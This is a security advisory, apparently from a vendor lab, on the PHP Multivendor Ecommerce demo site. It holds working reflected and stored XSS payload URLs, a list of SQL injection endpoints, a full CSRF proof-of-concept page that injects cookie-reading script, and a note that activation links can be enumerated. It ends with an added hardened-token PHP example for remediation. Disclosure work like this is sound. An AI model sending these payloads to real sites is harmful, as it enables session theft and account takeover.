PHP Multivendor Ecommerce - the latest version - SQL Injection/Reflect-XSS/Stored-XSS/CSRF/Arbitrary-Binding
ADLab of Venustech
Well, when I pentested the official demo site of PHP Multivendor Ecommerce, I found some vulnerabilities.
XSS:
Reflect-XSS
XSS1
http://www.fxwebsolution.com/demo/arthi/multivendor/category.php?chid1=40%27%22%3E123%3Cimg%20src=x%20onerror=console.log(/xss/)%3E123%3C%27%22
XSS2
http://www.fxwebsolution.com/demo/arthi/multivendor/seller-view.php?usid=60%27%22123%3Cimg%20src=x%20onerror=console.log(/xss2/)%3E123%3C%27%22
XSS3
http://www.fxwebsolution.com/demo/arthi/multivendor/shopping-cart.php?cusid=60%27%22123%3Cimg%20src=x%20onerror=console.log(/xss3/)%3E123%3C%27%22
XSS4
http://www.fxwebsolution.com/demo/arthi/multivendor/my_wishlist.php?fid=60%27%22123%3Cimg%20src=x%20onerror=console.log(/xss4/)%3E123%3C%27%22
Stored-XSS
http://www.fxwebsolution.com/demo/arthi/multivendor/admin/sellerupd.php?upd=2&uid=36&id=61
POST parameters:
------WebKitFormBoundary2wspk6wZ1zP1BEHR
Content-Disposition: form-data; name="companyname"
abc pvt ltd'"><svg/onload=alert(document.cookie)><'"
SQL Injection:
sqli1
http://www.fxwebsolution.com//demo/arthi/multivendor/seller-view.php?usid=60
sqli2
http://www.fxwebsolution.com/demo/arthi/multivendor/shopping-cart.php?cusid=60
sqli3
http://www.fxwebsolution.com/demo/arthi/multivendor/my_wishlist.php?fid=60
As you can see, we can obtain the current database user or more sensitive data now!
CSRF
A CSRF attack can trick a logged-in user into changing sensitive settings in the user panel, and even into adding stored-XSS content to it.
poc:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/www.fxwebsolution.com\/demo\/arthi\/multivendor\/admin\/sellerupd.php?upd=2&uid=36&id=61", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundary2wspk6wZ1zP1BEHR");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
xhr.withCredentials = true;
var body = "------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"idvalue\"\r\n" +
"\r\n" +
"61\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"upd\"\r\n" +
"\r\n" +
"2\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"user_mail\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"companyname\"\r\n" +
"\r\n" +
"abc pvt ltd\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"companyname\"\r\n" +
"\r\n" +
"abc pvt ltd\'\"\x3e\x3csvg/onload=alert(document.cookie)\x3e\x3c\'\"\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"about\"\r\n" +
"\r\n" +
"ihguifhugjhufdhgjhd\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"store\"\r\n" +
"\r\n" +
"avc\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"cphone\"\r\n" +
"\r\n" +
"2147483647\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"policy\"\r\n" +
"\r\n" +
"gfgfvhhjj\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"address1\"\r\n" +
"\r\n" +
"chennai\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"address2\"\r\n" +
"\r\n" +
"chennai\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"proof\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"_submit\"\r\n" +
"\r\n" +
"Save\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
This vulnerability does not require the attacker to log in to the user panel; only the victim needs an active session.
Arbitrary-Binding
I found that when we register an account, we have to verify the email to activate the account.
But the URL which is sent to the email is predictable. For example, the URL the system sent to my email is:
http://www.fxwebsolution.com/demo/arthi/multivendor/sign-in.php?eqid=NTA=
After Base64 decoding:
http://www.fxwebsolution.com/demo/arthi/multivendor/sign-in.php?eqid=50
So it's easy to predict or enumerate the eqid to activate our account, and then we can bind the account to any email account, even if it does not exist.
In a word, it's an arbitrary-binding bug.
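The activation link above is only base64 of a sequential user id, which is why it can be guessed. The following is an added example (not code from the advisory or from PHP Multivendor Ecommerce) that puts that weak scheme beside a hardened one: a random, single-use, time-limited token whose hash is stored server-side and looked up with a prepared statement; the table and column names (users, user_activation, token_hash, expires_at) are assumptions.

```php
<?php
// Added example, not the project's code. Contrasts the predictable eqid scheme
// with a hardened activation token. Table/column names are assumptions.
declare(strict_types=1);

// The demo site's scheme: eqid is only base64(user id), so NTA= decodes to 50 and
// the next registrant's link is simply base64("51").
function weakActivationParam(int $userId): string {
    return base64_encode((string) $userId);
}

// Hardened: 256 bits from the CSPRNG, single use, time-limited, and only a hash of
// the token is stored, so a read of the table does not yield working links.
function issueActivationToken(PDO $db, int $userId, int $ttlSeconds = 3600): string {
    $token = bin2hex(random_bytes(32));
    $db->prepare('INSERT INTO user_activation (user_id, token_hash, expires_at) VALUES (?, ?, ?)')
       ->execute([$userId, hash('sha256', $token), time() + $ttlSeconds]);
    return $token;
}

// Returns the activated user id, or null for a malformed, unknown, expired or
// already-used token. The user id comes from the stored row, never from the URL,
// so a token cannot be replayed to activate or re-bind someone else's account.
function activateAccount(PDO $db, string $token): ?int {
    if (!preg_match('/^[0-9a-f]{64}$/', $token)) {
        return null;
    }
    $hash = hash('sha256', $token);
    $db->beginTransaction();
    $stmt = $db->prepare('SELECT user_id, expires_at FROM user_activation WHERE token_hash = ?');
    $stmt->execute([$hash]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Burn the row whether or not it is still valid; an expired token is useless anyway.
    $db->prepare('DELETE FROM user_activation WHERE token_hash = ?')->execute([$hash]);
    if ($row === false || (int) $row['expires_at'] < time()) {
        $db->commit();
        return null;
    }
    $db->prepare('UPDATE users SET activated = 1 WHERE id = ?')->execute([(int) $row['user_id']]);
    $db->commit();
    return (int) $row['user_id'];
}

// Self-contained demo on an in-memory SQLite database with constructed sample data.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, activated INTEGER NOT NULL DEFAULT 0)');
$db->exec('CREATE TABLE user_activation (user_id INTEGER, token_hash TEXT PRIMARY KEY, expires_at INTEGER)');
$db->exec('INSERT INTO users (id) VALUES (50)');
$token = issueActivationToken($db, 50);
printf("legacy param: %s, activated user: %s, replay: %s\n", weakActivationParam(50),
    var_export(activateAccount($db, $token), true), var_export(activateAccount($db, $token), true));
```

The second activateAccount call in the demo returns null because the token was deleted on first use, which is the property the eqid scheme lacks.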